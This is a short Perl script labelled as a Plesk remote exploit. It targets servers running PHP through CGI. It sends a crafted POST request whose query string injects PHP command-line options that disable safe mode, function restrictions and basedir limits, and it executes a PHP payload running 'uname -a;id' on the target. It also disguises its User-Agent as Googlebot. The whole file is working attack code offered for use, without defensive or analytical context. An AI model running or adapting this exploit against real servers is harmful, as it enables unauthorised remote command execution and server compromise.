pretty-lolcope-simple.pl

1. #plesk remote exploit by kingcope
2. #all your base belongs to me :>
3. use strict;
4. use warnings;
5. use IO::Socket;
6. use URI::Escape;
7. main {
8. my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
9.     PeerPort => 80,
10.     Proto    => 'tcp') or die "OH GOD HOW DID THIS GET HERE I AM NOT GOOD WITH SOCKETS";
11. my $pwn = '<?php echo "Content-Type:text/html\r\n\r\n";echo "OK\n";system("uname -a;id;"); ?>';
12. my $arguments = uri_escape("-d","\0-\377"). "+" .
13.     uri_escape("allow_url_include=on","\0-\377"). "+" .
14.     uri_escape("-d","\0-\377"). "+" .
15.     uri_escape("safe_mode=off","\0-\377"). "+" .
16.     uri_escape("-d","\0-\377"). "+" .
17.     uri_escape("suhosin.simulation=on","\0-\377"). "+" .
18.     uri_escape("-d","\0-\377"). "+" .
19.     uri_escape("disable_functions=\"\"","\0-\377"). "+" .
20.     uri_escape("-d","\0-\377"). "+" .
21.     uri_escape("open_basedir=none","\0-\377"). "+" .
22.     uri_escape("-d","\0-\377"). "+" .
23.     uri_escape("auto_prepend_file=php://input","\0-\377"). "+" .
24.     uri_escape("-n","\0-\377");
25. my $path = uri_escape("phppath","\0-\377") . "/" . uri_escape("php","\0-\377");
26. print $sock "POST /$path?$arguments HTTP/1.1\r\n"
27.     ."Host: $ARGV[0]\r\n"
28.     ."User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n"
29.     ."Content-Type: application/x-www-form-urlencoded\r\n"
30.     ."Content-Length: ". length($pwn) ."\r\n\r\n" . $pwn;
31. while(<$sock>) {
32.     print;
33.     }
34. }
35. &main();